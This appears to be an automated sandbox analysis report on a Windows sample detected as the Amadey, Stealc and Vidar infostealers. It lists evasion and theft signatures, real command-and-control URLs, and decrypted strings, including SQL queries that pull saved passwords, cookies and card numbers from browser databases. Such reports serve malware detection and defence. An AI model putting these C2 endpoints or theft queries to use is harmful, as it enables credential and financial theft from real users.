Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1570352
MD5:	ec0745bf77524d3c74c33d99cf8965c0
SHA1:	fb8a999984b6ef511cad2b5274f39097f29e9824
SHA256:	6a9bcf5a71115d675d22b7fafec11f27ce9aafd64ea717096b96b9da875bcbbf
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files to the document folder of the user

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

Monitors registry run keys for changes

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/c4becf79229cb002.phpLy	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/sqlite3.dllk	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dll.	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/mozglue.dllu	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php423177b60194262422f8d727cf88	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpDI	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000011.00000002.2037822618.0000000000A11000.00000040.00000001.01000000.0000000E.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0.2.file.exe.3a0000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "drum"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe	ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: 07
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: 01
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: 20
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: 25
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetProcAddress
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: LoadLibraryA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: lstrcatA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: OpenEventA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CreateEventA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CloseHandle
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Sleep
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: VirtualFree
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetSystemInfo
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: VirtualAlloc
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: HeapAlloc
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetComputerNameA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: lstrcpyA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetProcessHeap
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetCurrentProcess
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: lstrlenA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: ExitProcess
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetSystemTime
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: advapi32.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: gdi32.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: user32.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: crypt32.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetUserNameA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CreateDCA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetDeviceCaps
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: ReleaseDC
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sscanf
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: VMwareVMware
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: HAL9TH
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: JohnDoe
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: DISPLAY
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: http://185.215.113.206
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: /c4becf79229cb002.php
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: /68b591d6548ec281/
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: drum
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetFileAttributesA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: HeapFree
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetFileSize
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GlobalSize
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: IsWow64Process
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Process32Next
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetLocalTime
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: FreeLibrary
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Process32First
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: DeleteFileA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: FindNextFileA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: LocalFree
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: FindClose
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: LocalAlloc
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetFileSizeEx
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: ReadFile
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SetFilePointer
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: WriteFile
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CreateFileA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: FindFirstFileA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CopyFileA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: VirtualProtect
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetLastError
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: lstrcpynA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GlobalFree
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GlobalAlloc
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: OpenProcess
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: TerminateProcess
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: gdiplus.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: ole32.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: bcrypt.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: wininet.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: shlwapi.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: shell32.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SelectObject
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: BitBlt
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: DeleteObject
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GdiplusStartup
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GdiplusShutdown
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GdipDisposeImage
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GdipFree
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CoUninitialize
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CoInitialize
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CoCreateInstance
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: BCryptDecrypt
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: BCryptSetProperty
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetWindowRect
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetDesktopWindow
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetDC
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CloseWindow
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: wsprintfA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CharToOemW
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: wsprintfW
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RegQueryValueExA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RegCloseKey
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RegEnumValueA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CryptUnprotectData
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: ShellExecuteExA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: InternetConnectA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: InternetCloseHandle
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: HttpSendRequestA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: InternetReadFile
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: StrCmpCA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: StrStrA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: StrCmpCW
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: PathMatchSpecA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RmStartSession
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RmRegisterResources
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RmGetList
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: RmEndSession
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3_open
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3_step
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3_column_text
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3_finalize
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3_close
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: encrypted_key
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: PATH
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: NSS_Init
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: NSS_Shutdown
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: PK11_Authenticate
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: C:\ProgramData\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: browser:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: profile:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: url:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: login:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: password:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Opera
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: OperaGX
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Network
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: cookies
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: .txt
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: TRUE
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: FALSE
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: autofill
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: history
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: cc
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: name:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: month:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: year:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: card:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Cookies
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Login Data
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Web Data
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: History
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: logins.json
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: formSubmitURL
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: usernameField
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: encryptedUsername
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: encryptedPassword
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: guid
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: cookies.sqlite
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: formhistory.sqlite
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: places.sqlite
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: plugins
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Local Extension Settings
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Sync Extension Settings
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: IndexedDB
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Opera Stable
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Opera GX Stable
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: CURRENT
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: chrome-extension_
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Local State
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: profiles.ini
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: chrome
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: opera
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: firefox
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: wallets
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: ProductName
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: x32
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: x64
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: DisplayName
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: DisplayVersion
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Network Info:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - IP: IP?
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Country: ISO?
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: System Summary:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - HWID:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - OS:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Architecture:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - UserName:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Computer Name:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Local Time:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - UTC:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Language:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Keyboards:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Laptop:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Running Path:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - CPU:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Threads:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Cores:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - RAM:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - Display Resolution:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: - GPU:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: User Agents:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Installed Apps:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: All Users:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Current User:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: Process List:
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: system_info.txt
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: freebl3.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: mozglue.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: msvcp140.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: nss3.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: softokn3.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: vcruntime140.dll
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: \Temp\
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: .exe
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: runas
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: open
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: /c start
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %DESKTOP%
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %APPDATA%
Source: 0.2.file.exe.3a0000.0.unpack	String decryptor: %LOCALAPPDATA%
